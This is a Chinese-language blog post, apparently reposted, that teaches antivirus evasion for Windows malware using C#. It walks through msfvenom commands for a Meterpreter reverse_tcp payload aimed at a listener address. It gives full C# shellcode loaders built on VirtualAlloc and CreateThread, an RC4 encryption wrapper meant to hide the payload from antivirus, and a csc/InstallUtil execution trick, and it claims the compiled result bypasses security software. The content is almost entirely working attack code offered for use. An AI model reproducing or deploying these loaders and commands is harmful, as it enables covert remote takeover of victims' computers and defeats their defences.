热门标签
热门文章
- 1单片机C语言实例:14、音频输出_单片机音频输出
- 22024年浙江省信息通信行业职业技能竞赛信息安全测试员竞赛CTF比赛REVERSE部分
- 3微信小程序从后端获取音频数据流并播放
- 4AllenAI 发布万能问答系统 MACAW!各类题型样样精通,性能大幅超越 GPT-3!
- 5idea gitcommit时缓慢_git 提交jsp文件时间太长
- 6KafkaJavaApi操作:练习题_在kafka集群中创建student主题,分区为3个,副本为2个
- 7大模型微调方法总结(非常详细)零基础入门到精通,收藏这一篇就够了_大模型微调学习路线
- 8android11展锐 Selinux 添加设备节点问题修改及具体实现_ums9620 开发板
- 9笔记分享: 香港中文大学CSCI5610高级数据结构——最邻近查询
- 10Linux服务器升级openssh9.8最新版全过程,及遇到问题处理_openssh最新版本
当前位置: article > 正文
WEB渗透免杀篇-C#源码免杀
作者:一键难忘520 | 2024-08-19 08:59:09
赞
踩
WEB渗透免杀篇-C#源码免杀
直接编译
生成payload MSF监听需设置自动迁移进程
- set autorunscript migrate -n explorer.exe
- >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
-
MSF启动监听 Payload粘贴到位置
- using System;
- using System.Runtime.InteropServices;
- namespace TCPMeterpreterProcess
- {
- class Program
- {
- static void Main(string[] args)
- {
- byte[] shellcode = new byte[] {payload here};
- UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
- Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
- IntPtr hThread = IntPtr.Zero;
- UInt32 threadId = 0;
- // prepare data
- IntPtr pinfo = IntPtr.Zero;
- // execute native code
- hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
- WaitForSingleObject(hThread, 0xFFFFFFFF);
- }
- private static UInt32 MEM_COMMIT = 0x1000;
- private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
- [DllImport("kernel32")]
- private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
- UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
- [DllImport("kernel32")]
- private static extern bool VirtualFree(IntPtr lpAddress,
- UInt32 dwSize, UInt32 dwFreeType);
- [DllImport("kernel32")]
- private static extern IntPtr CreateThread(
- UInt32 lpThreadAttributes,
- UInt32 dwStackSize,
- UInt32 lpStartAddress,
- IntPtr param,
- UInt32 dwCreationFlags,
- ref UInt32 lpThreadId
- );
- [DllImport("kernel32")]
- private static extern bool CloseHandle(IntPtr handle);
- [DllImport("kernel32")]
- private static extern UInt32 WaitForSingleObject(
- IntPtr hHandle,
- UInt32 dwMilliseconds
- );
- [DllImport("kernel32")]
- private static extern IntPtr GetModuleHandle(
- string moduleName
- );
- [DllImport("kernel32")]
- private static extern UInt32 GetProcAddress(
- IntPtr hModule,
- string procName
- );
- [DllImport("kernel32")]
- private static extern UInt32 LoadLibrary(
- string lpFileName
- );
- [DllImport("kernel32")]
- private static extern UInt32 GetLastError();
- }
- }
Visual studio创建C#.net framework控制台程序编译可过杀软
加密处理
生成payload MSF监听需设置自动迁移进程
- set autorunscript migrate -n explorer.exe
- >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
-
粘贴payload后编译加密
- using System;
- using System.Collections.Generic;
- using System.IO;
- using System.Linq;
- using System.Security.Cryptography;
- using System.Text;
- using System.Threading.Tasks;
- using System.Reflection;
- using System.Runtime.CompilerServices;
- using System.Runtime.InteropServices;
- namespace Payload_Encrypt_Maker
- {
- class Program
- {
- // 加密密钥,可以更改,加解密源码中保持KEY一致就行
- static byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
- static byte[] IV = { 0x00, 0xcc, 0x00, 0x00, 0x00, 0xcc };
- static byte[] payload = { payload here }; // 替换成MSF生成的shellcode
- private static class Encryption_Class
- {
- public static string Encrypt(string key, string data)
- {
- Encoding unicode = Encoding.Unicode;
- return Convert.ToBase64String(Encrypt(unicode.GetBytes(key), unicode.GetBytes(data)));
- }
- public static byte[] Encrypt(byte[] key, byte[] data)
- {
- return EncryptOutput(key, data).ToArray();
- }
- private static byte[] EncryptInitalize(byte[] key)
- {
- byte[] s = Enumerable.Range(0, 256)
- .Select(i => (byte)i)
- .ToArray();
- for (int i = 0, j = 0; i < 256; i++)
- {
- j = (j + key[i % key.Length] + s[i]) & 255;
- Swap(s, i, j);
- }
- return s;
- }
- private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
- {
- byte[] s = EncryptInitalize(key);
- int i = 0;
- int j = 0;
- return data.Select((b) =>
- {
- i = (i + 1) & 255;
- j = (j + s[i]) & 255;
- Swap(s, i, j);
- return (byte)(b ^ s[(s[i] + s[j]) & 255]);
- });
- }
- private static void Swap(byte[] s, int i, int j)
- {
- byte c = s[i];
- s[i] = s[j];
- s[j] = c;
- }
- }
- static void Main(string[] args)
- {
- byte[] result = Encryption_Class.Encrypt(KEY, payload);
- int b = 0;
- for (int i = 0; i < result.Length; i++)
- {
- b++;
- if (i == result.Length + 1)
- { Console.Write(result[i].ToString()); }
- if (i != result.Length) { Console.Write(result[i].ToString() + ","); }
- }
- }
- }
- }
编译解密
- using System;
- using System.Collections.Generic;
- using System.Linq;
- using System.Text;
- using System.Runtime.InteropServices;
- using System.Threading;
- using System.Reflection;
- using System.Runtime.CompilerServices;
-
- namespace NativePayload_Reverse_tcp
- {
- public class Program
- {
- public static void Main()
- {
- Shellcode.Exec();
- }
- }
- class Shellcode
- {
- public static void Exec()
- {
- string Payload_Encrypted;
- Payload_Encrypted = "payload here";
- string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
- byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
- for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
- {
- byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
- _X_to_Bytes[i] = current;
- }
- // 解密密钥,可以更改,加解密源码中保持KEY一致就行
- byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
- byte[] MsfPayload = Decrypt(KEY, _X_to_Bytes);
- // 加载shellcode
- IntPtr returnAddr = VirtualAlloc((IntPtr)0, (uint)Math.Max(MsfPayload.Length, 0x1000), 0x3000, 0x40);
- Marshal.Copy(MsfPayload, 0, returnAddr, MsfPayload.Length);
- CreateThread((IntPtr)0, 0, returnAddr, (IntPtr)0, 0, (IntPtr)0);
- Thread.Sleep(2000);
- }
- public static byte[] Decrypt(byte[] key, byte[] data)
- {
- return EncryptOutput(key, data).ToArray();
- }
- private static byte[] EncryptInitalize(byte[] key)
- {
- byte[] s = Enumerable.Range(0, 256)
- .Select(i => (byte)i)
- .ToArray();
- for (int i = 0, j = 0; i < 256; i++)
- {
- j = (j + key[i % key.Length] + s[i]) & 255;
- Swap(s, i, j);
- }
- return s;
- }
- private static IEnumerable<byte> EncryptOutput(byte[] key, IEnumerable<byte> data)
- {
- byte[] s = EncryptInitalize(key);
- int i = 0;
- int j = 0;
- return data.Select((b) =>
- {
- i = (i + 1) & 255;
- j = (j + s[i]) & 255;
- Swap(s, i, j);
- return (byte)(b ^ s[(s[i] + s[j]) & 255]);
- });
- }
- private static void Swap(byte[] s, int i, int j)
- {
- byte c = s[i];
- s[i] = s[j];
- s[j] = c;
- }
- [DllImport("kernel32.dll")]
- public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
- [DllImport("kernel32.dll")]
- public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
- }
- }
XOR和AES编码
与上文xor加密类似
CSC+InstallUtil
生成payload MSF监听需设置自动迁移进程
- set autorunscript migrate -n explorer.exe
- >msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 20 -b '\x00' LHOST=192.168.0.108 LPORT=12138 -f csharp -o cs.txt
-
Payload粘贴到InstallUtil-Shellcode.cs中使用csc编译
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\Users\y\Desktop\shell.exe C:\Users\y\Desktop\InstallUtil-ShellCode.cs
执行
C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\y\Desktop\shell.exe
声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
